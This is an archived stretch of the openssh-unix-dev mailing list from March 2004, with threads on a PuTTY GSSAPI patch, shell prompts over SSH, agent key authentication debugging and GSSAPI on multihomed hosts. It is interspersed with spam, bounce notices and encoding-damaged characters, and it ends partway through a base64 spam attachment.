PuTTY Message-ID: <300597.1133764-7651-1920466199-1080165146@seznam.cz> Hello, I have made GSSAPI authentication for PuTTY 0.54. This patch is available here: http://sweb.cz/v_t_m/ Vaclav ____________________________________________________________ Vyzkousejte.. Kontaktni cocky znacky ACUVUE zajistuji vynikajici pohodli, optickou kvalitu a zdravy zpusob noseni kontaktnich cocek. Vice na www.acuvue.cz. http://ad2.seznam.cz/redir.cgi?instance=72685%26url=http://www.acuvue.cz From eddy at cdf-imaging.com Thu Mar 25 09:38:56 2004 From: eddy at cdf-imaging.com (Edward Flick) Date: Wed, 24 Mar 2004 16:38:56 -0600 Subject: PATCH: GSSAPI authentication in PuTTY In-Reply-To: <300597.1133764-7651-1920466199-1080165146@seznam.cz> References: <300597.1133764-7651-1920466199-1080165146@seznam.cz> Message-ID: <40620E00.8030908@cdf-imaging.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Why aren't you submitting this to the PuTTY crew? Is PuTTY based on OpenSSH? V?clav Tomec wrote: | Hello, | | I have made GSSAPI authentication for PuTTY 0.54. | This patch is available here: | http://sweb.cz/v_t_m/ | | Vaclav | ____________________________________________________________ | Vyzkousejte.. | Kontaktni cocky znacky ACUVUE zajistuji vynikajici pohodli, optickou kvalitu a zdravy zpusob noseni kontaktnich cocek. Vice na www.acuvue.cz. | http://ad2.seznam.cz/redir.cgi?instance=72685%26url=http://www.acuvue.cz | | _______________________________________________ | openssh-unix-dev mailing list | openssh-unix-dev at mindrot.org | http://www.mindrot.org/mailman/listinfo/openssh-unix-dev -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) iD8DBQFAYg3/vWeCZ4RLdzYRAigLAJwJhICobowWpAdtO4PuRVAzrBMjagCfWt18 7PkR2a+xGRrbdgzHerkZW/s= =o32U -----END PGP SIGNATURE----- From djm at mindrot.org Thu Mar 25 10:56:16 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 25 Mar 2004 10:56:16 +1100 Subject: Where does the "prompt come from" In-Reply-To: References: Message-ID: <40622020.4060703@mindrot.org> Niclas B?ckman C (LI/EAB) wrote: > Hi All ! > I have a little question about the shell that is run when establishing a > connection towards an SSH server. > The client(OpenSSH) displays a prompt(as usual) when a command is executed, > but my question is, where does the prompt come from. > Is it sent by the remote shell or is it handled in the client ?? > > The reason I ask is that we have developed a product that redirects > stdin/stdout/stderr from the ssh binary to a socket, and we then > perform socket read/writes directly into the ssh tunnel. But when i perform > a command, the prompt is never read up from the server. > So it's difficult to know when a remote script is finished. Using the same > solution but towards a telnet server always results in a prompt > back to the client. The prompt comes from the shell that the server executes. If you want to use OpenSSH as a transport, you should probably invent a little protocol and implement it as a subsystem. sftp does this. -d From mouring at etoh.eviladmin.org Thu Mar 25 11:12:11 2004 From: mouring at etoh.eviladmin.org (Ben Lindstrom) Date: Wed, 24 Mar 2004 18:12:11 -0600 (CST) Subject: PATCH: GSSAPI authentication in PuTTY In-Reply-To: <40620E00.8030908@cdf-imaging.com> Message-ID: On Wed, 24 Mar 2004, Edward Flick wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Why aren't you submitting this to the PuTTY crew? Is PuTTY based on > OpenSSH? > No PuTTY is not based on OpenSSH. - Ben From bob at proulx.com Thu Mar 25 15:21:11 2004 From: bob at proulx.com (Bob Proulx) Date: Wed, 24 Mar 2004 21:21:11 -0700 Subject: ssh only with password In-Reply-To: <40613891.1080906@physik.uni-wuppertal.de> References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> <20040323222504.N29714@greenie.muc.de> <40613891.1080906@physik.uni-wuppertal.de> Message-ID: <20040325042111.GA26231@misery.proulx.com> Martin Imhaeuser wrote: > * I have deleted all files in my home directory and started again fresh. > * I have taken the commands "mv" and "cat" and checked the permissions. I had to start there... > Further the remote machine and the local machine are the same. I login > as imhaeuse (user) on milaptop (machine), open a shell, type exec > ssh-agent $SHELL and ssh-add, give my passphrase and finally type ssh > imhaeuse at milaptop. This should be the moment where my password is not > needed any longer. BUT I must enter my password. > > The funny thing is when I login as root on milaptop the procedure is > working meaning that I must not enter my password for root. Do you have a .shosts or .rhosts file or hosts.equiv enabling this? If you are root then ssh will start with a privileged port. Of course this depends upon other configuration too but could explain why root is allowed without a password. If this is the issue then 'ssh -P' as root should avoid getting a privileged port and have the same behavior as a non-root user. > Following you see my context in the shell afer the command "ssh milaptop > -vvv": I am going to need some help from the list to completely decode this. > [imhaeuse at milaptop imhaeuse]$ ssh milaptop -vvv > OpenSSH_3.4p1-CERN20020919, SSH protocols 1.5/2.0, OpenSSL 0x0090602f > debug1: Reading configuration data /etc/ssh/ssh_config > debug1: Applying options for * > debug1: Rhosts Authentication disabled, originating port will not be > trusted. > debug1: ssh_connect: needpriv 0 > debug1: Connecting to milaptop [127.0.0.1] port 22. > debug1: Connection established. > debug1: identity file /home/imhaeuse/.ssh/identity type 0 > debug1: identity file /home/imhaeuse/.ssh/id_rsa type -1 > debug1: identity file /home/imhaeuse/.ssh/id_dsa type -1 Does this mean that you are using ssh protocol 1 keys? Can you use protocol 2 keys, as I suggested by 'ssh-keygen -t rsa'? Is your server configured to allow protocol 1 keys? What does 'ssh-add -l' say? Does it show an RSA key or an RSA1 key? > debug1: Remote protocol version 1.99, remote software version > OpenSSH_3.4p1-CERN20020919 > debug1: match: OpenSSH_3.4p1-CERN20020919 pat OpenSSH* > debug1: Local version string SSH-1.5-OpenSSH_3.4p1-CERN20020919 > debug1: Waiting for server public key. > debug1: Received server public key (768 bits) and host key (1024 bits). > debug3: check_host_in_hostfile: filename /home/imhaeuse/.ssh/known_hosts > debug3: check_host_in_hostfile: match line 1 > debug1: Host 'milaptop' is known and matches the RSA1 host key. > debug1: Found key in /home/imhaeuse/.ssh/known_hosts:1 > debug1: Encryption type: 3des > debug1: Sent encrypted session key. > debug1: cipher_init: set keylen (16 -> 32) > debug1: cipher_init: set keylen (16 -> 32) > debug1: Installing crc compensation attack detector. > debug1: Received encrypted confirmation. > debug1: Trying Kerberos v5 authentication. > debug3: Trying to reverse map address 127.0.0.1. > debug1: Kerberos v5: krb5_mk_req failed: No credentials cache found > debug1: Trying Kerberos v4 authentication. > debug1: Kerberos v4: no ticket file /tmp/tkt500 > debug1: Trying RSA authentication via agent with 'imhaeuse at milaptop' > debug1: Server refused our key. > debug1: RSA authentication using agent refused. I think no protocol 2 key was found here. > debug1: Trying RSA authentication with key '/home/imhaeuse/.ssh/identity' > debug1: Server refused our key. Looks like protocol 1 key was rejected. > debug1: Doing password authentication. > imhaeuse at milaptop's password: > > Has somebody an idea what is wrong with my system? I may have the above analysis wrong. But it is my best guess. Hopefully someone on the list will correct me. Bob From niclas.c.backman at ericsson.com Thu Mar 25 18:33:58 2004 From: niclas.c.backman at ericsson.com (=?iso-8859-1?Q?Niclas_B=E4ckman_C_=28LI/EAB=29?=) Date: Thu, 25 Mar 2004 08:33:58 +0100 Subject: Where does the "prompt come from" Message-ID: Hi Damien ! Thanks for your feedback ! We have implemented a secure command line interface api that wants to perform "normal" shell operations, but from an application. That's why I don't want to add a new subsystem. I just want to run for instance scripts, towards a secured remote host. But the data that is passed to the socket doesn't include the prompt itself, like '>'. The socket is a redirekt from the client's stdout/stderr. If I use a standard client like OpenSSH the client echoes back the prompt after a command is executed, but in my scenarion it's lost and never written to stdout/stderr(my socket). Does the SSH client remove the prompt in some way before data is passed to stdout/stderr ?? Many thanks in advance ! /Niclas -----Original Message----- From: Damien Miller [mailto:djm at mindrot.org] Sent: den 25 mars 2004 00:56 To: Niclas B?ckman C (LI/EAB) Cc: 'openssh-unix-dev at mindrot.org' Subject: Re: Where does the "prompt come from" Niclas B?ckman C (LI/EAB) wrote: > Hi All ! > I have a little question about the shell that is run when establishing a > connection towards an SSH server. > The client(OpenSSH) displays a prompt(as usual) when a command is executed, > but my question is, where does the prompt come from. > Is it sent by the remote shell or is it handled in the client ?? > > The reason I ask is that we have developed a product that redirects > stdin/stdout/stderr from the ssh binary to a socket, and we then > perform socket read/writes directly into the ssh tunnel. But when i perform > a command, the prompt is never read up from the server. > So it's difficult to know when a remote script is finished. Using the same > solution but towards a telnet server always results in a prompt > back to the client. The prompt comes from the shell that the server executes. If you want to use OpenSSH as a transport, you should probably invent a little protocol and implement it as a subsystem. sftp does this. -d This communication is confidential and intended solely for the addressee(s). Any unauthorized review, use, disclosure or distribution is prohibited. If you believe this message has been sent to you in error, please notify the sender by replying to this transmission and delete the message without disclosing it. Thank you. E-mail including attachments is susceptible to data corruption, interruption, unauthorized amendment, tampering and viruses, and we only send and receive e-mails on the basis that we are not liable for any such corruption, interception, amendment, tampering or viruses or any consequences thereof. From djm at mindrot.org Thu Mar 25 19:10:46 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 25 Mar 2004 19:10:46 +1100 Subject: Where does the "prompt come from" In-Reply-To: References: Message-ID: <40629406.7060500@mindrot.org> Niclas B?ckman C (LI/EAB) wrote: > Hi Damien ! > Thanks for your feedback ! > We have implemented a secure command line interface api that wants to perform "normal" shell > operations, but from an application. > That's why I don't want to add a new subsystem. > I just want to run for instance scripts, towards a secured remote host. But the data that is passed > to the socket doesn't include the prompt itself, like '>'. The socket is a redirekt from the client's > stdout/stderr. > If I use a standard client like OpenSSH the client echoes back the prompt after a command is executed, > but in my scenarion it's lost and never written to stdout/stderr(my socket). > Does the SSH client remove the prompt in some way before data is passed to stdout/stderr ?? > Many thanks in advance ! No, neither the client nor the server modify the data from a user's shell. If you are doing the equivalent of "ssh somehost command" then there will never be a prompt displayed. From dtucker at zip.com.au Thu Mar 25 19:00:41 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Thu, 25 Mar 2004 19:00:41 +1100 Subject: Where does the "prompt come from" In-Reply-To: References: Message-ID: <406291A9.3030702@zip.com.au> Niclas B?ckman C (LI/EAB) wrote: > If I use a standard client like OpenSSH the client echoes back the prompt after a command is executed, > but in my scenarion it's lost and never written to stdout/stderr(my socket). > Does the SSH client remove the prompt in some way before data is passed to stdout/stderr ?? > Many thanks in advance ! You could try forcing an interactive shell: ssh yourhost /bin/sh -i -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From mailer-daemon at groups.msn.com Thu Mar 25 21:36:57 2004 From: mailer-daemon at groups.msn.com (mailer-daemon at groups.msn.com) Date: Thu, 25 Mar 2004 02:36:57 -0800 Subject: =?iso-8859-1?q?Tu_mensaje_de_correo_electr=F3nico_a_lastatu=40gr?= =?iso-8859-1?q?oups=2Emsn=2Ecom_no_ha_podido_ser_entregado?= Message-ID: El siguiente mensaje no ha podido ser entregado. S?lo los miembros de ese grupo pueden enviar mensajes de correo electr?nico a esta cuenta. La direcci?n de correo electr?nico desde la que has enviado este mensaje no te identifica como participante del grupo. Si eres participante, puedes comprobar o modificar la direcci?n de correo electr?nico con la que te registraste en este grupo en la p?gina Configuraci?n de correo electr?nico. Si no eres participante y deseas incorporarte a este grupo, puedes solicitarlo ahora. Para obtener m?s informaci?n acerca de MSN Grupos o si necesitas resolver alguna duda, consulta nuestra ?rea de Ayuda. http://help.msn.com/es_es/helpwindow.asp?INI=wcv8.ini&H_APP=Grupos+Web+MSN Gracias, MSN Grupos -------------- next part -------------- An embedded message was scrubbed... From: Subject: fake Date: Thu, 25 Mar 2004 11:36:55 +0100 Size: 697 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040325/6415eb65/attachment.mht From aphor at speakeasy.net Fri Mar 26 00:52:21 2004 From: aphor at speakeasy.net (Jeremy McMillan) Date: Thu, 25 Mar 2004 07:52:21 -0600 Subject: openssh-unix-dev Digest, Vol 11, Issue 28 In-Reply-To: <20040325081402.BC9C627C2BB@shitei.mindrot.org> References: <20040325081402.BC9C627C2BB@shitei.mindrot.org> Message-ID: The shell that executes on the remote server takes input in the form of shell commands before it issues a prompt. When you redirect commands from ssh client to a shell on the remote server there is usually a trailing EOF to tell the shell to exit. If the shell gets an EOF it should not respond with a prompt. Also, some shells decide whether or not to issue a prompt by TTY detection. What about inserting something into your command string to duplicate what you expect a telnet prompt to do: echo "command -a;echo ###DONE###;command -b;echo ###DONE###" | ssh remotuser at host | grep '^###DONE###$' | ( while read line; do echo "Anotherone bitesthedust..."; done ) On Mar 25, 2004, at 2:14 AM, Niclas B?ckman C (LI/EAB) wrote: > Message: 8 > Date: Thu, 25 Mar 2004 08:33:58 +0100 > From: Niclas B?ckman C (LI/EAB) > Subject: RE: Where does the "prompt come from" > To: "'Damien Miller'" > Cc: "'openssh-unix-dev at mindrot.org'" > Message-ID: > > > > Content-Type: text/plain; charset="iso-8859-1" > > Hi Damien ! > Thanks for your feedback ! > We have implemented a secure command line interface api that wants to > perform "normal" shell > operations, but from an application. > That's why I don't want to add a new subsystem. > I just want to run for instance scripts, towards a secured remote > host. But the data that is passed > to the socket doesn't include the prompt itself, like '>'. The socket > is a redirekt from the client's > stdout/stderr. > If I use a standard client like OpenSSH the client echoes back the > prompt after a command is executed, > but in my scenarion it's lost and never written to stdout/stderr(my > socket). > Does the SSH client remove the prompt in some way before data is > passed to stdout/stderr ?? > Many thanks in advance ! > /Niclas > --- Jeremy McMillan From samidaremogami at yahoo.co.jp Fri Mar 26 02:36:17 2004 From: samidaremogami at yahoo.co.jp (golder) Date: Fri, 26 Mar 2004 00:36:17 +0900 Subject: =?iso-2022-jp?b?GyRCTCQ+NUJ6OS05cCIoGyhCNTAwMBskQjFfJEczKzZIGyhC?= =?iso-2022-jp?b?GyRCJDckXiQ7JHMkKyEqGyhC?= Message-ID: <20040325.1536170734@samidaremogami-yahoo.co.jp> ? ??? ?????? ??????????????? ?????????????????????????????? ??????????????????????????????????? ???? bluelandok at yahoo.co.jp ??????????? ??????????????? ??????????? ????????TEL 0774-56-6428 ??????? ?????? ???????????????????? ??????????????????????????????? ?????????????? ????????????????? ???????????????????????????????? ?????http://goodmails.redirectme.net/????? ??????? From nectar at FreeBSD.org Fri Mar 26 02:51:56 2004 From: nectar at FreeBSD.org (Jacques A. Vidrine) Date: Thu, 25 Mar 2004 09:51:56 -0600 Subject: GSSAPI patch for multihomed hosts In-Reply-To: <000801c41137$c51d1ef0$fa00a8c0@home> References: <000801c41137$c51d1ef0$fa00a8c0@home> Message-ID: <20040325155156.GE62344@madman.celabo.org> On Wed, Mar 24, 2004 at 12:34:23AM -0000, Markus Moeller wrote: > Hi, > > This is another attempt to get my gssapi for multi homed systems into > openssh. Please find attach a small change so that gssapi authentication > works on multihomed systems. I don't think this patch should be applied. At least in the (MIT|Heimdal) Kerberos case, it is better to simply pass GSS_C_NO_NAME to gss_acquire_cred to accomplish the same thing. More desirable IMHO is a patch for the client to use HostKeyAlias to compute the GSSAPI name (so that tunneled SSH+GSSAPI connections work). I have something similar (but uses a different option name). Due to compatiblity issues, I'm still on OpenSSH 3.6.1+GSSAPI patches, but when I get a chance to migrate to 3.8 I will post patches here. Cheers, -- Jacques Vidrine / nectar at celabo.org / jvidrine at verio.net / nectar at freebsd.org From MAILER-DAEMON at lon-postoffice.telstra.net Fri Mar 26 04:56:56 2004 From: MAILER-DAEMON at lon-postoffice.telstra.net (MAILER-DAEMON at lon-postoffice.telstra.net) Date: 25 Mar 2004 17:56:56 -0000 Subject: failure notice Message-ID: <20040325181141.1D8F527C18A@shitei.mindrot.org> Hi. This is the qmail-send program at lon-postoffice.telstra.net. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. : 203.217.30.81 does not like recipient. Remote host said: 554 : Sender address rejected: internal address Giving up on 203.217.30.81. --- Below this line is a copy of the message. Return-Path: Received: (qmail 96104 invoked from network); 25 Mar 2004 17:43:00 -0000 Received: from unknown (HELO 205.147.224.9) (205.147.224.9) by lon-postoffice.telstra.net with SMTP; 25 Mar 2004 17:43:00 -0000 Message-ID: <20040325204155.5383CDAADD163AAB at ill.be.back.net> From: "Gallery-a" To: openssh-unix-dev at mindrot.org Subject: >>> the copies of ancient master?s masterpieces ************ (0388571815) Date: 25 Mar 2004 20:41:57 +0300 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_000_0012_8EBF5E94.D1C28CC2" ------=_NextPart_000_0012_8EBF5E94.D1C28CC2 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0013_8EBF5E94.D1C28CC2" ------=_NextPart_001_0013_8EBF5E94.D1C28CC2 Content-Type: text/plain Content-Transfer-Encoding: 8bit this is HTML-message, but Your browser do not support them. Visit follow link for fix it http://www.gallery-a.ru/expo/index.php/smirnoff ------=_NextPart_001_0013_8EBF5E94.D1C28CC2 Content-Type: text/html; charset="windows-1251" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlv bmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPkl2YW4gU21pcm5vZmY8L3RpdGxl Pg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7 IGNoYXJzZXQ9d2luZG93cy0xMjUxIj4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQo8IS0t DQpib2R5IHsNCglmb250LWZhbWlseTogQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsN Cn0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHkgYmdjb2xvcj0iI0ZGRkZGRiIg dGV4dD0iIzAwMDAwMCIgbGluaz0iI0ZGMDAwMCIgdmxpbms9IiNGRjAwMDAiIGFsaW5rPSIj RkYwMDAwIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+DQogIDxwPjxhIGhyZWY9Imh0dHA6Ly93 d3cuZ2FsbGVyeS1hLnJ1L2V4cG8vaW5kZXgucGhwL3NtaXJub2ZmIiB0YXJnZXQ9Il9ibGFu ayI+PGltZyBzcmM9ImNpZDowMDAwMDYuanBnIiBhbHQ9Ikl2YW4gU21pcm5vZmYiIHdpZHRo PSIyMDAiIGhlaWdodD0iMTU2IiBib3JkZXI9IjAiPjwvYT4gDQogIDwvcD4NCiAgPHA+PHN0 cm9uZz48Zm9udCBjb2xvcj0iIzAwMDA2NiI+SVZBTiBTTUlSTk9GRjwvZm9udD48L3N0cm9u Zz48L3A+DQogIDxwPjxhIGhyZWY9Imh0dHA6Ly93d3cuZ2FsbGVyeS1hLnJ1L2V4cG8vaW5k ZXgucGhwL3NtaXJub2ZmIiB0YXJnZXQ9Il9ibGFuayI+PHN0cm9uZz5DTElDSyANCiAgICBU TyBLTk9XIE1PUkU8L3N0cm9uZz48L2E+PC9wPg0KPC9kaXY+DQo8L2JvZHk+DQo8L2h0bWw+ DQo= ------=_NextPart_001_0013_8EBF5E94.D1C28CC2-- ------=_NextPart_000_0012_8EBF5E94.D1C28CC2 Content-Type: image/jpeg; name="000006.jpg" Content-Transfer-Encoding: base64 Content-ID: <000006.jpg> /9j/4AAQSkZJRgABAQAAAQABAAD//gA+Q1JFQVRPUjogZ2QtanBlZyB2MS4wICh1c2luZyBJ SkcgSlBFRyB2NjIpLCBkZWZhdWx0IHF1YWxpdHkK/9sAQwAIBgYHBgUIBwcHCQkICgwUDQwL CwwZEhMPFB0aHx4dGhwcICQuJyAiLCMcHCg3KSwwMTQ0NB8nOT04MjwuMzQy/9sAQwEJCQkM CwwYDQ0YMiEcITIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIy/8AAEQgAnADIAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYH CAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEV UtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0 dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV 1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMBAQEBAQEBAQEAAAAAAAABAgMEBQYH CAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUhMQYSQVEHYXETIjKBCBRCkaGxwQkj M1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpz dHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT 1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQACEQMRAD8A82L7jnGD9acHOMYBPWoW BU9eKUN6Vxs1RJ1Oec1ZBO3PGPSqy54FTxjAwMfiKhjsSLJwQBTx93I59aau3PHSpBgD+tZX KFHT8KkjJX5sA/1qMY3VKp3A4weOtS3ZjNfUdKnhncwxPJaZ/dzJ86Fe3zD5Tjpn1BrMZJYm 2MCp64YYOKntdRu7CdZLSd4Wzn1Bzwcjofxrf0zxTbpbyW+pQytEyg7YRuWRgeNyE7cAHjAG MD3rNyYzndzAdB70dT2HvXov9l6Hf6dHdQ20N1DEpDNbDy3j5PLouCRx976nAHXKfwvpc65s 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 